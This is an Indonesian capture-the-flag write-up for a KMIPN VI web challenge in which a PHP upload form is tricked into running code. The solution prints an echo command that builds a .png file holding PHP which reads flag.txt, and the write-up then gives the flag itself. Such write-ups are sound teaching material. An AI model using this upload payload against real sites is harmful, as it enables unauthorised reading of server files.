just simple upload

Tantangan web KMIPN VI yang sangat mudah diselesaikan. Seperti pada namanya, upload file dan dapatkan flagnya jika paylaod-nya sudah sesuai.

1. Deskripsi Tantangan

temen ku baru belajar bikin form upload, sepertinya tidak beres

http://157.173.204.136:8089/

2. Langkah Penyelesaian

• Sebuah web simple berbasis PHP yang memiliki fitur untuk upload file.

• Craft sebuah png file yang disisipkan dengan script malicious php berikut ini.

echo "<?php echo file_get_contents('flag.txt'); ?>" > get_flag.png

• Upload file tersebut dan nantinya akan tampil flag-nya!

3. Flag

KMIPNVIPNJ{disable_function_on_upload_file_exploit}

---

References

• https://github.com/azfarwisnu/KMIPN-FINAL-CYBER-SECURITY-2024/tree/main/web

---

Tags: #ctf, #web